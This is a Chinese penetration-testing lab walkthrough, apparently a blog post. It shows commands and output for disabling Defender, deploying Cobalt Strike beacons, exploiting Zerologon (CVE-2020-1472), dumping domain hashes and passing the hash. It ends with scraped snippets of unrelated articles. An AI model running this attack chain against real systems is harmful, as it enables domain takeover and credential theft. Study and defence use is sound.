                                   ProfSvc, Schedule, SENS, ShellHWDetection,
                                   Themes, UserManager, Winmgmt, wlidsvc,
                                   WpnService
svchost.exe                   1204 Wcmsvc
spoolsv.exe                   1628 Spooler
svchost.exe                   1672 DiagTrack
vmtoolsd.exe                  1712 VMTools
svchost.exe                   1772 StateRepository, tiledatamodelsvc
svchost.exe                   1784 LanmanServer
VGAuthService.exe             1792 VGAuthService
MsMpEng.exe                   1824 WinDefend
dllhost.exe                   2244 COMSysApp
msdtc.exe                     2364 MSDTC
WmiPrvSE.exe                  2956 N/A
RuntimeBroker.exe             3980 N/A
sihost.exe                    1624 N/A
svchost.exe                   1660 CDPUserSvc_6b7cd, OneSyncSvc_6b7cd
taskhostw.exe                 2464 N/A
ChsIME.exe                     396 N/A
explorer.exe                  3872 N/A
ShellExperienceHost.exe       3344 N/A
SearchUI.exe                  1392 N/A
vm3dservice.exe               3512 N/A
vmtoolsd.exe                  3656 N/A
ApplicationFrameHost.exe      2176 N/A
LogonUI.exe                    624 N/A
ChsIME.exe                    5056 N/A
LockAppHost.exe               4932 N/A
LockApp.exe                   1348 N/A
csrss.exe                     2432 N/A
winlogon.exe                  1812 N/A
dwm.exe                       1960 N/A
ChsIME.exe                    1228 N/A
RuntimeBroker.exe             4872 N/A
sihost.exe                    3372 N/A
svchost.exe                   1652 CDPUserSvc_5f77fd, OneSyncSvc_5f77fd
taskhostw.exe                 4412 N/A
explorer.exe                  3100 N/A
ChsIME.exe                     576 N/A
ShellExperienceHost.exe       5000 N/A
ServerManager.exe             3844 N/A
SearchUI.exe                  5052 N/A
vm3dservice.exe                308 N/A
cmd.exe                        380 N/A
conhost.exe                   2584 N/A
MpCmdRun.exe                  3328 N/A
PSEXESVC.exe                  3976 PSEXESVC
128to129.exe                  4480 N/A
conhost.exe                   3196 N/A
notepad.exe                   2220 N/A
notepad.exe                   4364 N/A
notepad.exe                   2104 N/A
cmd.exe                       4572 N/A
conhost.exe                     68 N/A
tasklist.exe                  3652 N/A



杀软信息

msmpeng.exe：windows defender
mpcmdrun.exe：windows defender

关闭Windows Defeder

上传

关闭

PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/DefenderSwitch.exe -off

结果

检查

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       316 N/A
csrss.exe                      384 N/A
wininit.exe                    480 N/A
csrss.exe                      488 N/A
winlogon.exe                   556 N/A
services.exe                   604 N/A
lsass.exe                      612 KeyIso, Netlogon, SamSs, VaultSvc
svchost.exe                    700 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    760 RpcEptMapper, RpcSs
dwm.exe                        844 N/A
svchost.exe                    908 NcbService, Netman, PcaSvc, StorSvc,
                                   TrkWks, UALSVC, wudfsvc
svchost.exe                    916 Dhcp, EventLog, lmhosts, TimeBrokerSvc
svchost.exe                    924 CDPSvc, EventSystem, FontCache,
                                   LicenseManager, netprofm, nsi, W32Time,
                                   WinHttpAutoProxySvc
svchost.exe                   1012 BFE, CoreMessagingRegistrar, DPS, MpsSvc
svchost.exe                   1020 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                   1104 Appinfo, DsmSvc, gpsvc, iphlpsvc, lfsvc,
                                   ProfSvc, Schedule, SENS, ShellHWDetection,
                                   Themes, UserManager, Winmgmt, WpnService
svchost.exe                   1204 Wcmsvc
spoolsv.exe                   1628 Spooler
svchost.exe                   1672 DiagTrack
vmtoolsd.exe                  1712 VMTools
svchost.exe                   1772 StateRepository, tiledatamodelsvc
svchost.exe                   1784 LanmanServer
VGAuthService.exe             1792 VGAuthService
dllhost.exe                   2244 COMSysApp
msdtc.exe                     2364 MSDTC
WmiPrvSE.exe                  2956 N/A
RuntimeBroker.exe             3980 N/A
sihost.exe                    1624 N/A
svchost.exe                   1660 CDPUserSvc_6b7cd, OneSyncSvc_6b7cd
taskhostw.exe                 2464 N/A
ChsIME.exe                     396 N/A
explorer.exe                  3872 N/A
ShellExperienceHost.exe       3344 N/A
SearchUI.exe                  1392 N/A
vm3dservice.exe               3512 N/A
vmtoolsd.exe                  3656 N/A
ApplicationFrameHost.exe      2176 N/A
LogonUI.exe                    624 N/A
ChsIME.exe                    5056 N/A
LockAppHost.exe               4932 N/A
LockApp.exe                   1348 N/A
csrss.exe                     2432 N/A
winlogon.exe                  1812 N/A
dwm.exe                       1960 N/A
ChsIME.exe                    1228 N/A
RuntimeBroker.exe             4872 N/A
sihost.exe                    3372 N/A
svchost.exe                   1652 CDPUserSvc_5f77fd, OneSyncSvc_5f77fd
taskhostw.exe                 4412 N/A
explorer.exe                  3100 N/A
ChsIME.exe                     576 N/A
ShellExperienceHost.exe       5000 N/A
ServerManager.exe             3844 N/A
SearchUI.exe                  5052 N/A
vm3dservice.exe                308 N/A
cmd.exe                        380 N/A
conhost.exe                   2584 N/A
PSEXESVC.exe                  3976 PSEXESVC
128to129.exe                  4480 N/A
conhost.exe                   3196 N/A
cmd.exe                       4572 N/A
conhost.exe                     68 N/A
TrustedInstaller.exe          2192 TrustedInstaller
tasklist.exe                   180 N/A


杀软
无

上线CS

设置代理

参考
https://mp.weixin.qq.com/s/HwWR3-2IWFEp-tmSnNWDrA

生成木马

上传

复制到10.10.1.128的机器上

执行

PsExec.exe \\10.10.1.128 -u administrator -p QWEasd123 -i c:/128to129tocs.exe

结果

失败、转发不成功

tomcat-web Beacon 添加转发规则

shell netsh advfirewall firewall add rule name="6160" protocol=TCP dir=in localport=6160 action=allow

结果

再次尝试

失败

还是不行！！！！

使用CS的psexec进行上线

上面我们使用CS的psexec进行上线10.10.1.128的域内主机的时候、我们使用的是反向连接的方式进行的、但是我们在后面的扫描中发现10.10.1.128机器是只开放445端口的、我们是只能利用正向连接的方式进行建立会话的、再次尝试

使用正向连接

成功上线cs

dc域内信息搜集

使用msf

meterpreter > ipconfig /all

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  2
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:a8c
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  4
============
Name         : Intel(R) 82574L Gigabit Network Connection #2
Hardware MAC : 00:0c:29:76:60:d0
MTU          : 1500
IPv4 Address : 10.10.10.140            #域内网卡
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c5d:2340:1275:9b44
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  7
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:76:60:c6
MTU          : 1500
IPv4 Address : 10.10.1.128              #本机网卡
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::d142:345b:c480:4c70
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 23
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:180
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

使用shell

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 FILESERVER                #主机名
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows 用户
Registered Organization:
Product ID:                00377-60000-00000-AA912
Original Install Date:     2020/11/4, 20:46:55
System Boot Time:          2022/2/8, 23:02:17
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
                           [02]: Intel64 Family 6 Model 166 Stepping 0 GenuineIntel ~1608 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     2,047 MB
Available Physical Memory: 834 MB
Virtual Memory: Max Size:  2,815 MB
Virtual Memory: Available: 1,559 MB
Virtual Memory: In Use:    1,256 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    fbi.gov               #发现域控名称：fbi.gov
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3199986
                           [02]: KB3200970
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.1.128
                                 [02]: fe80::d142:345b:c480:4c70
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet1
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.140
                                 [02]: fe80::c5d:2340:1275:9b44
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.




C:\Windows\system32>arp -a
arp -a

Interface: 10.10.10.140 --- 0x4
  Internet Address      Physical Address      Type
  10.10.10.1            00-50-56-c0-00-13     dynamic
  10.10.10.139          00-0c-29-37-c2-ee     dynamic    #域主机出现
  10.10.10.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static

Interface: 10.10.1.128 --- 0x7
  Internet Address      Physical Address      Type
  10.10.1.129           00-0c-29-49-bb-5d     dynamic     #tomcat-web
  10.10.1.254           00-50-56-e8-81-6b     dynamic
  10.10.1.255           ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static
  239.255.255.250       01-00-5e-7f-ff-fa     static


C:\>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : fileserver
   Primary Dns Suffix  . . . . . . . : fbi.gov
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : fbi.gov

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-76-60-C6
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::d142:345b:c480:4c70%8(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.1.128(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.1.254
   DHCPv6 IAID . . . . . . . . . . . : 50334761
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-8D-04-45-00-0C-29-76-60-C6
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-76-60-D0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::c5d:2340:1275:9b44%5(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.10.140(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 150998057
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-8D-04-45-00-0C-29-76-60-C6
   DNS Servers . . . . . . . . . . . : 10.10.10.139
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{8438E7C5-35B5-4521-9CCA-52E6E2A1F1F7}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

使用cs

beacon> net computers            #域内主机信息（名称、域内ip）
[*] Tasked beacon to run net computers
[+] host called home, sent: 105062 bytes
[+] received output:
Computers:

 Server Name             IP Address                      
 -----------             ----------                      
 DC                      10.10.10.139      #dc域主机出现10.10.10.139
 FILESERVER              10.10.1.128

beacon> net dclist                  #域内主机列表
[*] Tasked beacon to run net dclist
[+] host called home, sent: 105059 bytes
[+] received output:
DCs:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
[-] Error: 6118

beacon> net domain                   #域名称
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
fbi.gov

beacon> net domain_controllers       #域主机信息
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 105071 bytes
[+] received output:
Domain Controllers:

 Server Name             IP Address                      
 -----------             ----------                      
 DC                      10.10.10.139     #dc主机信息

beacon> net domain_trusts         #域主机状态
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 105066 bytes
[+] received output:
List of domain trusts:

    0: FBI fbi.gov (Forest tree root) (Primary Domain) (Native)

beacon> net group                #域内分组
[*] Tasked beacon to run net group on localhost
[+] host called home, sent: 105058 bytes
[+] received output:
Groups:

 Name                                             Comment
 ----                                             -------

beacon> net localgroup              #当前机器在域内所属组
[*] Tasked beacon to run net localgroup on localhost
[+] host called home, sent: 105063 bytes
[+] received output:
Local groups for \\localhost:

 Name                                             Comment
 ----                                             -------

beacon> net logons                 #域内登录用户
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 105059 bytes
[+] received output:
Logged on users at \\localhost:

FILESERVER\Administrator
FBI\FILESERVER$
FBI\FILESERVER$
FBI\FILESERVER$

beacon> net sessions                 #域内连接会话
[*] Tasked beacon to run net sessions on localhost
[+] host called home, sent: 105061 bytes
[+] received output:
Sessions for \\localhost:

 Computer               User name            Active (s)     Idle (s)
 --------               ---------            ----------     --------
 \\[fe80::1479:3673:41d4:fdd7] Administrator        760            1
 \\[::1]                FILESERVER$          5              0

beacon> net share                   #域控开启的share方式
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 105058 bytes
[+] received output:
Shares at \\localhost:

 Share name                       Comment
 ----------                       -------
 ADMIN$                           远程管理
 C$                               默认共享
 IPC$                             远程 IPC

beacon> net time                   #域主机时间
[*] Tasked beacon to run net time on localhost
[+] host called home, sent: 105057 bytes
[+] received output:
Current time at \\localhost is 2/10/2022 00:06:33

beacon> net user                    #域主机用户
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 105057 bytes
[+] received output:
Users for \\localhost:

Administrator (admin)
DefaultAccount
Guest

beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 105057 bytes
[+] received output:
List of hosts:


[+] received output:
 Server Name             IP Address                       Platform  Version  Type   Comment
 -----------             ----------                       --------  -------  ----   -------
[-] Error: 6118

发现域主机（10.10.10.139）

00x10-攻破域主机

上面我们发现域主机10.10.1.0.139

10.139域主机信息搜集

添加路由

run autoroute -s 10.10.10.0/24

开启socks代理

访问

端口扫描

使用masscan

proxychains4 sudo masscan -p 1-65535 10.10.10.139 --rate=1000

使用nmap

proxychains4 sudo nmap -sT -Pn 10.10.10.139 -v

发现开启的有135、139、445三个危险端口全部开放

进程扫描

beacon> shell net start
[*] Tasked beacon to run: net start
[+] host called home, sent: 40 bytes
[+] received output:
已经启动以下 Windows 服务: 

   Application Information
   Background Tasks Infrastructure Service
   Base Filtering Engine
   CDPUserSvc_4b177
   CNG Key Isolation
   COM+ Event System
   COM+ System Application
   Connected User Experiences and Telemetry
   CoreMessaging
   Credential Manager
   Cryptographic Services
   DCOM Server Process Launcher
   Device Setup Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Geolocation Service
   Group Policy Client
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   Local Session Manager
   Netlogon
   Network Connection Broker
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler         #打印机
   Program Compatibility Assistant Service
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Secondary Logon
   Security Accounts Manager
   Server
   Shell Hardware Detection
   State Repository Service
   Storage Service
   System Event Notification Service
   System Events Broker
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   Tile Data model server
   Time Broker
   User Access Logging Service
   User Manager
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Connection Manager
   Windows Driver Foundation - User-mode Driver Framework
   Windows Event Log
   Windows Firewall                      #防火墙是开着的
   Windows Font Cache Service
   Windows Management Instrumentation
   Windows Remote Management (WS-Management)
   Windows Time
   Windows 推送通知系统服务
   Windows 许可证管理器服务
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   同步主机_4b177

命令成功完成

攻击域控主机10.10.10.139

上面我们在扫描端口的时候发现135和445端口都是开放的、直接干CVE（CVE-2020-1472）

CVE-2020-1472

参考
https://www.jianshu.com/p/b4997ebed2e8

上传poc文件到攻击机（192.168.1.130）

执行

proxychains4 python3 CVE-2020-1472_Exploit.py dc 10.10.10.139

结果

利用

参考
https://xz.aliyun.com/t/8367

proxychains4 python3 secretsdump.py ascotbe.com/dc\[email protected] -no-pass

获取的密码

proxychains4 python3 secretsdump.py ascotbe.com/dc\[email protected] -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:5555  ...  10.10.10.139:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:5555  ...  10.10.10.139:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:5555  ...  10.10.10.139:49667  ...  OK



Administrator:500:aad3b435b51404eeaad3b435b51404ee:669a3273144a82b942377c1001ed03a3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d19009f38e6b6720109b3fab3fa98090:::
fbi.gov\fileserver:1103:aad3b435b51404eeaad3b435b51404ee:a7670b92c536e6684b3620f2ddca7539:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FILESERVER$:1104:aad3b435b51404eeaad3b435b51404ee:4c2f12d2ff86868fe619c1221c8457f2:::

[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:a4b17d1c198d7e84afdc7879ad5b97f0da34d1f3e6fd0be1ecd4784a77918425
Administrator:aes128-cts-hmac-sha1-96:4dfa69ce7f92780bccfd24aecb7b20d9
Administrator:des-cbc-md5:2a7fcdc4bcbcadec
krbtgt:aes256-cts-hmac-sha1-96:4d4002368e4e7970bf5cf920bc8de2ed5d77dcf58ec649b02cdede0b3f0f2130
krbtgt:aes128-cts-hmac-sha1-96:f23ad681adf209b1f21c5554e828a85b
krbtgt:des-cbc-md5:4fa19183bc5be38f
fbi.gov\fileserver:aes256-cts-hmac-sha1-96:ced6482b3d945503d2d87fc38db7b6d72439e987c96f1a40427ee80dbd150fb1
fbi.gov\fileserver:aes128-cts-hmac-sha1-96:2f0ef12454dc325b520b8f38afd6d588
fbi.gov\fileserver:des-cbc-md5:98aea8f14a325e97
DC$:aes256-cts-hmac-sha1-96:61df1f3d887f788352e6a215260741fe50ab7c8304878a99218e644bbac683d5
DC$:aes128-cts-hmac-sha1-96:90307e2edc8642691d28ae3c98e05792
DC$:des-cbc-md5:68409d31b591a18c
FILESERVER$:aes256-cts-hmac-sha1-96:c77b8e2890ae2f28caa2870c12060ad110fb46d888f976055bdf5a1cde65c0ed
FILESERVER$:aes128-cts-hmac-sha1-96:d7d89ccd5bab1a7c454451128df71e3e
FILESERVER$:des-cbc-md5:5404b3d0130e80f2
[*] Cleaning up...

登录用户

proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:669a3273144a82b942377c1001ed03a3 [email protected]

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:669a3273144a82b942377c1001ed03a3 fbi.gov/[email protected]

拿到system权限的会话和administrator的会话

写在最后

欢迎大家加入星球一起学习、里面有各种红队资源、工具、各种小技巧啊！

你可能感兴趣的:(红队,tomcat,网络,linux,安全,web安全)

android系统selinux中添加新属性property 辉色投像
1.定位/android/system/sepolicy/private/property_contexts声明属性开头：persist.charge声明属性类型：u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
微服务下功能权限与数据权限的设计与实现 nbsaas-boot 微服务 java 架构
在微服务架构下，系统的功能权限和数据权限控制显得尤为重要。随着系统规模的扩大和微服务数量的增加，如何保证不同用户和服务之间的访问权限准确、细粒度地控制，成为设计安全策略的关键。本文将讨论如何在微服务体系中设计和实现功能权限与数据权限控制。1.功能权限与数据权限的定义功能权限：指用户或系统角色对特定功能的访问权限。通常是某个用户角色能否执行某个操作，比如查看订单、创建订单、修改用户资料等。数据权限：
c++ 的iostream 和 c++的stdio的区别和联系黄卷青灯77 c++算法开发语言 iostream stdio
在C++中，iostream和C语言的stdio.h都是用于处理输入输出的库，但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系：区别1.编程风格iostream（C++风格）：C++标准库中的输入输出流类库，支持面向对象的输入输出操作。典型用法是cin（输入）和cout（输出），使用>操作符来处理数据。更加类型安全，支持用户自定义类型的输入输出。#includeintmain(){in
Long类型前后端数据不一致 igotyback 前端
响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题，尤其是当后端使用Java的Long类型（64位）与前端JavaScript的Number类型（最大安全整数为2^53-1，即16位）进行数据交互时，很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
Linux下QT开发的动态库界面弹出操作（SDL2） 13jjyao QT类 qt 开发语言 sdl2 linux
需求：操作系统为linux，开发框架为qt，做成需带界面的qt动态库，调用方为java等非qt程序难点：调用方为java等非qt程序，也就是说调用方肯定不带QApplication::exec()，缺少了这个，QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出)；这与qt调用本身qt库是有本质的区别的思路：1.调用方缺QApplication::exec()，那么我们在接口
linux sdl windows.h,Windows下的SDL安装奔跑吧linux内核 linux sdl windows.h
首先你要下载并安装SDL开发包。如果装在C盘下，路径为C:\SDL1.2.5如果在WINDOWS下。你可以按以下步骤：1.打开VC++，点击"Tools",Options2,点击directories选项3.选择"Includefiles"增加一个新的路径。"C:\SDL1.2.5\include"4，现在选择"Libaryfiles“增加"C:\SDL1.2.5\lib"现在你可以开始编写你的第
linux中sdl的使用教程,sdl使用入门 Melissa Corvinus linux中sdl的使用教程
本文通过一个简单示例讲解SDL的基本使用流程。示例中展示一个窗口，窗口里面有个随机颜色快随机移动。当我们鼠标点击关闭按钮时间窗口关闭。基本步骤如下：1.初始化SDL并创建一个窗口。SDL_Init()初始化SDL_CreateWindow()创建窗口2.纹理渲染存储RGB和存储纹理的区别：比如一个从左到右由红色渐变到蓝色的矩形，用存储RGB的话就需要把矩形中每个点的具体颜色值存储下来；而纹理只是一
PHP环境搭建详细教程好看资源平台前端 php
PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
基于社交网络算法优化的二维最大熵图像分割智能算法研学社（Jack旭）智能优化算法应用图像分割算法 php 开发语言
智能优化算法应用：基于社交网络优化的二维最大熵图像阈值分割-附代码文章目录智能优化算法应用：基于社交网络优化的二维最大熵图像阈值分割-附代码1.前言2.二维最大熵阈值分割原理3.基于社交网络优化的多阈值分割4.算法结果：5.参考文献：6.Matlab代码摘要：本文介绍基于最大熵的图像分割，并且应用社交网络算法进行阈值寻优。1.前言阅读此文章前，请阅读《图像分割：直方图区域划分及信息统计介绍》htt
使用 FinalShell 进行远程连接（ssh 远程连接 Linux 服务器）编程经验分享开发工具服务器 ssh linux
目录前言基本使用教程新建远程连接连接主机自定义命令路由追踪前言后端开发，必然需要和服务器打交道，部署应用，排查问题，查看运行日志等等。一般服务器都是集中部署在机房中，也有一些直接是云服务器，总而言之，程序员不可能直接和服务器直接操作，一般都是通过ssh连接来登录服务器。刚接触远程连接时，使用的是XSHELL来远程连接服务器，连接上就能够操作远程服务器了，但是仅用XSHELL并没有上传下载文件的功能
山东大学小树林支教调研团青青仓木队——翟晓楠山东大学青青仓木队
过了半年，又一次启程，又一次回到支教的初心之地。比起上一次的试探与不安，我更多了一丝稳重与熟练。心境、处境也都随着半个学期的过去而变得不同，半个学期中，身体上的，心理上的，太多的逆境让我变得步履维艰，曲曲折折，弯弯绕绕，我仿佛打不起精神，没有胃口，没有动力。感觉走的不顺畅的时候，支教这个旅程，给了我力量。自告奋勇承担起队长这一职务的我，从组织时的复杂和困难的经历，协调各种问题，从无到有，和校长和队
特殊的拜年飘雪的天堂
文/雪儿大年初一，家家户户没有了轰响的鞭炮声，大街上没有了人流涌动的喧闹，几乎看不到人影，变得冷冷清清。天刚亮不大会儿，村里的大喇叭响了起来：由于当前正值疾病高发期，流感流行的高峰期。同时，新型冠状病毒感染的肺炎进入第二波流行的上升期。为了自己和他人的健康安全着想，请大家尽量不要串门拜年，不要在街里走动。可以通过手机微信，视频，电话，信息拜年……今年的春节真是特别。禁止燃放鞭炮，烟花爆竹，禁止出村
2023-04-17|篮球女孩长一木
1小学抑或初中阶段，在课外书了解到她的故事。“篮球女孩”。当时佩服她的顽强，也对生命多了一丝敬畏。今天刚好在公众号看到，长大后的“篮球女孩”。佩服之余又满是心疼。网络侵删祝那素未蒙面的女孩，未来一切顺遂。
在一台Ubuntu计算机上构建Hyperledger Fabric网络落叶无声9 区块链超级账本 Hyperledger fabric 区块链 ubuntu 构建 hyperledger fabric
在一台Ubuntu计算机上构建HyperledgerFabric网络Hyperledgerfabric是一个开源的区块链应用程序平台，为开发基于区块链的应用程序提供了一个起点。当我们提到HyperledgerFabric网络时，我们指的是使用HyperledgerFabric的正在运行的系统。即使只使用最少数量的组件，部署Fabric网络也不是一件容易的事。Fabric社区创建了一个名为Cello
libyuv之linux编译 jaronho Linux linux 运维服务器
文章目录一、下载源码二、编译源码三、注意事项1、银河麒麟系统（aarch64）（1）解决armv8-a+dotprod+i8mm指令集支持问题（2）解决armv9-a+sve2指令集支持问题一、下载源码到GitHub网站下载https://github.com/lemenkov/libyuv源码，或者用直接用git克隆到本地，如：gitclonehttps://github.com/lemenko
【华为OD技术面试真题 - 技术面】-测试八股文真题题库（1）算法大师华为od 面试 python 算法前端
华为OD面试真题精选专栏：华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.黑盒测试和白盒测试的区别2.假设我们公司现在开发一个类似于微信的软件1.0版本，现在要你测试这个功能：打开聊天窗口，输入文本，限制字数在200字以内。问你怎么提取测试点。功能测试性能测试安全性测试可用性测试跨平台兼容性测试网络环境测试3.接口测试的工具你了解哪些
ARM驱动学习之5 LEDS驱动 JT灬新一嵌入式 C 底层 arm开发学习单片机
ARM驱动学习之5LEDS驱动知识点：•linuxGPIO申请函数和赋值函数–gpio_request–gpio_set_value•三星平台配置GPIO函数–s3c_gpio_cfgpin•GPIO配置输出模式的宏变量–S3C_GPIO_OUTPUT注意点：DRIVER_NAME和DEVICE_NAME匹配。实现步骤：1.加入需要的头文件：//Linux平台的gpio头文件#include//三
2019-05-13 王健_100a
【撒下18:2】大卫打发军兵出战，分为三队：一队在约押手下，一队在洗鲁雅的儿子约押兄弟亚比筛手下，一队在迦特人以太手下。大卫对军兵说：“我必与你们一同出战。”解释：大卫检阅部队，将它分成三队，每队由一位元帅统领；约押与兄弟亚比筛，并迦特人以太共同指挥。大卫想与他们一同出战！应用：作为领袖与军兵一起出战是很重要。领袖在事奉中与信徒一起，领袖在任何的环境里与信徒一起走过。我们要同心协力为主而战。祷告：
